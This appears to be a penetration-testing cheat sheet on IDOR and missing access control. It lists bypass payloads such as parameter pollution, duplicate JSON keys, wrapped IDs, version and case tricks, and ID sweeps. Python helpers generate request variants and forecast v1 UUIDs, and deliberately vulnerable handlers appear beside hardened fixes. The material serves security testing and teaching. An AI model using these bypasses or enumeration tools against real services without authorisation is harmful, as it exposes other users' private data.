IDOR
Basically, try to tamper with everything: every ID-bearing query parameter, path segment, header and body field.
Burp filter (matches any parameter whose name ends in "id", e.g. user_id, uuid, account_id, and captures its value):
(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)
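To see exactly what that filter catches and what it misses, here is an added example (not part of the original note) that runs the regex unchanged over a constructed request excerpt. The request lines, header values and the second regex for JSON keys are assumptions made for the demo.

```python
import re

# The Burp filter from the note, used verbatim.
ID_PARAM_RE = re.compile(r"""(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)""")

# Assumed companion filter for JSON bodies, where the filter above cannot match
# because keys are followed by ':' rather than '='.
JSON_ID_RE = re.compile(r'(?i)"(\w*id)"\s*:\s*("[^"]*"|[^,}\s]*)')

# Constructed sample traffic, not captured from any real target.
SAMPLE = """GET /api_v1/messages?user_id=1234&page=2&session_id='abc123' HTTP/1.1
Cookie: tracking_id="x-y-z"; theme=dark
identifier=should_not_match&video=also_not
{"user_id": 42, "account_id": 7}
"""


def find_id_params(text):
    """(name, raw value) for every name=value pair the Burp filter matches.
    Names like 'identifier' or 'video' do not match: 'id' must end the word."""
    hits = []
    for m in ID_PARAM_RE.finditer(text):
        name = m.group(0).split("=", 1)[0].strip()
        hits.append((name, m.group(1)))
    return hits


def find_json_id_keys(text):
    """(key, raw value) for JSON keys ending in 'id'; the page's filter skips these."""
    return [(m.group(1), m.group(2)) for m in JSON_ID_RE.finditer(text)]


if __name__ == "__main__":
    for hit in find_id_params(SAMPLE) + find_json_id_keys(SAMPLE):
        print(hit)
```

Quoted values keep their quotes, which is convenient when you later want to replace the whole token in a request. Keep the JSON variant alongside the query-string one when hunting in APIs that send IDs in bodies.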
Add parameters into the endpoints
GET /api_v1/messages --> 401
GET /api_v1/messages?user_id=victim_uuid --> 200
HTTP Parameter pollution
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
JSON Parameter Pollution:
POST /api/get_profile
Content-Type: application/json
{"user_id":<legit_id>,"user_id":<victim_id>}
Add .json to the endpoint if it is built on Ruby on Rails! Rails picks the response format from the suffix, and a format-specific responder or route can sit outside the authorization check.
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
Test outdated API versions (the authorization fix may only exist in the latest one):
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
Wrap the ID in an array:
{"id":111} --> 401 Unauthorized
{"id":[111]} --> 200 OK
Wrap the ID in a JSON object:
{"id":111} --> 401 Unauthorized
{"id":{"id":111}} --> 200 OK
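All three of the pollution and wrapping tricks above (duplicate query parameters, duplicate JSON keys, array/object-wrapped IDs) work for the same reason: the component that authorizes the request and the component that fetches the data read the parameter differently. The added example below (not code from the original note) models that split with a vulnerable handler beside a hardened one for each case. The user IDs, the inbox data and the specific parser behaviours are constructed assumptions; the first-wins JSON parser is emulated with an object_pairs_hook.

```python
import json
from urllib.parse import parse_qs

# Constructed sample data: two users and what each is allowed to see.
ATTACKER, VICTIM = "1001", "2002"
MESSAGES = {ATTACKER: ["attacker's own inbox"], VICTIM: ["victim's private inbox"]}


# --- HTTP parameter pollution: authz reads one copy, the data layer another ---

def vulnerable_messages(query, session_user):
    """Vulnerable: the auth check (say, a gateway) takes the FIRST user_id,
    the handler behind it takes the LAST. ?user_id=ME&user_id=VICTIM passes."""
    ids = parse_qs(query).get("user_id", [])
    if not ids or ids[0] != session_user:
        return 401, None
    return 200, MESSAGES.get(ids[-1])


def hardened_messages(query, session_user):
    """Hardened: exactly one user_id, and it must be the caller's own."""
    ids = parse_qs(query).get("user_id", [])
    if len(ids) != 1:
        return 400, None
    if ids[0] != session_user:
        return 401, None
    return 200, MESSAGES.get(ids[0])


# --- JSON key pollution: json.dumps() merges duplicate keys, so build the body by hand ---

def polluted_json_body(legit_id, victim_id):
    return '{"user_id": %s, "user_id": %s}' % (json.dumps(legit_id), json.dumps(victim_id))


def parse_last_wins(body):
    return json.loads(body)  # Python, Go and most JS runtimes keep the last duplicate


def parse_first_wins(body):
    """Emulates a parser that keeps the first duplicate key (assumed front-end behaviour)."""
    def keep_first(pairs):
        out = {}
        for k, v in pairs:
            out.setdefault(k, v)
        return out
    return json.loads(body, object_pairs_hook=keep_first)


def vulnerable_profile(body, session_user):
    """Vulnerable: a first-wins front end authorizes, a last-wins app serves."""
    if parse_first_wins(body).get("user_id") != session_user:
        return 401, None
    return 200, MESSAGES.get(parse_last_wins(body).get("user_id"))


# --- Wrapped IDs: a check that only looks at scalars, an app that "helpfully" unwraps ---

def unwrap(value):
    while isinstance(value, (list, dict)):
        value = value[0] if isinstance(value, list) else value.get("id")
    return value


def vulnerable_by_id(body, session_user):
    """Vulnerable: {"id": "2002"} is refused, {"id": ["2002"]} and {"id": {"id": "2002"}} are not."""
    raw = json.loads(body).get("id")
    if isinstance(raw, str) and raw != session_user:  # only plain values are checked
        return 401, None
    return 200, MESSAGES.get(unwrap(raw))


def hardened_by_id(body, session_user):
    """Hardened: reject anything that is not the expected scalar type before comparing."""
    raw = json.loads(body).get("id")
    if not isinstance(raw, str):
        return 400, None
    if raw != session_user:
        return 401, None
    return 200, MESSAGES.get(raw)
```

The fix is the same in every case: validate the type and cardinality of the identifier once, at the point where authorization is decided, and pass that exact value on to the data layer rather than re-parsing the request.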
Missing Function Level Access Control
GET /admin/profile -> 401
GET /ADMIN/profile -> 200
- Try sending a wildcard (*) instead of an ID.
- If the ID is numeric, sweep a large range of values instead of guessing a few.
- If the endpoint has a name like /api/users/myinfo, check for /api/admin/myinfo
- Swap the request method (GET/POST/PUT/DELETE/PATCH); the authorization check may be bound to a single verb.
- Check whether the Referer header is used to validate requests.
- Swap a GUID for a numeric ID or an email address.
- Try obvious GUIDs such as the nil UUID 00000000-0000-0000-0000-000000000000 or 11111111-1111-1111-1111-111111111111
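The path, method and ID checks above, together with the .json suffix and older-version tricks earlier, are mechanical enough to generate rather than type by hand. The added example below (not part of the original note) builds the candidate list for one refused request and triages replay results; it does not send traffic itself. The path templates, the status table and the list of segment names that get swapped for "admin" are assumptions for the demo.

```python
import re

METHODS = ("GET", "POST", "PUT", "DELETE", "PATCH")
NIL_GUID = "00000000-0000-0000-0000-000000000000"
ONES_GUID = "11111111-1111-1111-1111-111111111111"
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
VERSION_RE = re.compile(r"/v(\d+)/")


def path_variants(path):
    """Paths worth replaying when `path` returns 401/403: per-segment case changes,
    a /users/ -> /admin/ swap, every older /vN/, a .json suffix and a trailing slash."""
    out = set()
    segs = path.strip("/").split("/")
    for i, seg in enumerate(segs):
        for alt in (seg.upper(), seg.capitalize()):
            out.add("/" + "/".join(segs[:i] + [alt] + segs[i + 1:]))
        if seg.lower() in ("user", "users"):   # assumed naming convention
            out.add("/" + "/".join(segs[:i] + ["admin"] + segs[i + 1:]))
    m = VERSION_RE.search(path)
    if m:
        for v in range(1, int(m.group(1))):
            out.add(path[:m.start()] + f"/v{v}/" + path[m.end():])
    out.add(path + ".json")
    out.add(path + "/")
    out.discard(path)
    return sorted(out)


def id_candidates(seen_id, span=100):
    """A numeric ID gets a sweep of its neighbours (no guessing); a GUID gets the
    obvious constants; everything gets the wildcard."""
    if seen_id.isdigit():
        n = int(seen_id)
        return [str(i) for i in range(max(n - span, 1), n + span + 1) if i != n] + ["*"]
    if GUID_RE.fullmatch(seen_id):
        return [NIL_GUID, ONES_GUID, "*"]
    return ["*"]


def method_path_variants(path):
    """Every verb against the original path and each of its variants."""
    return [(m, p) for p in [path] + path_variants(path) for m in METHODS]


def referer_variants(headers, origin):
    """Replay once without Referer and once with the target's own origin."""
    base = {k: v for k, v in headers.items() if k.lower() != "referer"}
    return [base, {**base, "Referer": origin + "/"}]


def triage(baseline_status, results):
    """Given the refused baseline and {(method, path): status} from replays,
    return the variants that succeeded."""
    if baseline_status not in (401, 403):
        return []
    return [req for req, status in results.items() if 200 <= status < 300]


if __name__ == "__main__":
    for req in method_path_variants("/v3/users_data/1234")[:10]:
        print(req)
```

Feed the output to whatever replays requests for you (Burp Intruder, a small script with your session cookie) and diff statuses and body lengths against the baseline; a 200 where the original got 401/403 is the finding, a 200 with an empty body usually is not.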
GUID
GUID v1 (time-based UUID) can be predictable: it embeds a 60-bit timestamp (100 ns ticks since 1582-10-15), a 14-bit clock sequence and the generating host's node ID (usually its MAC address). Given one sample, the other IDs that host issued around the same time can be forecast rather than guessed.
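An added worked example (not from the original note) using Python's standard uuid module: decode the fields of a v1 GUID and forecast the neighbouring values the same host would have issued. The sample GUID, its embedded timestamp, clock sequence and node are all constructed for the demo.

```python
import uuid
from datetime import datetime, timedelta, timezone

GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)

# Constructed sample, as it might appear in a captured response (not a real object ID).
SAMPLE_V1 = "4c5d6e7f-2a3b-11ec-9234-001122334455"


def decode_v1(s):
    """Split a v1 UUID into the values an attacker cares about."""
    u = uuid.UUID(s)
    if u.version != 1:
        raise ValueError(f"not a v1 UUID (version={u.version})")
    return {
        "timestamp": u.time,                                        # 100 ns ticks since 1582-10-15
        "when": GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10),
        "clock_seq": u.clock_seq,
        "node": u.node,                                             # normally the host MAC
    }


def make_v1(timestamp, clock_seq, node):
    """Assemble a v1 UUID from its parts, using the same field layout as uuid.uuid1()."""
    return uuid.UUID(fields=(
        timestamp & 0xFFFFFFFF,            # time_low
        (timestamp >> 32) & 0xFFFF,        # time_mid
        (timestamp >> 48) & 0x0FFF,        # time_hi (version bits added below)
        (clock_seq >> 8) & 0x3F,           # clock_seq_hi (variant bits added below)
        clock_seq & 0xFF,                  # clock_seq_low
        node,
    ), version=1)


def forecast(sample, ticks_before, ticks_after):
    """UUIDs the same host would have produced within the given tick window of
    `sample`, assuming its clock sequence did not change in between. One tick is
    100 ns, so cover a real time window by scaling accordingly."""
    f = decode_v1(sample)
    return [str(make_v1(f["timestamp"] + d, f["clock_seq"], f["node"]))
            for d in range(-ticks_before, ticks_after + 1) if d != 0]


if __name__ == "__main__":
    fields = decode_v1(SAMPLE_V1)
    print(fields["when"].isoformat(), hex(fields["node"]), fields["clock_seq"])
    for candidate in forecast(SAMPLE_V1, 2, 2):
        print(candidate)
```

In practice you narrow the window from whatever the application leaks about creation time (a timestamp in the same response, a password-reset email's send time) and then enumerate the candidates against the endpoint; the node and clock sequence come for free from any one leaked GUID.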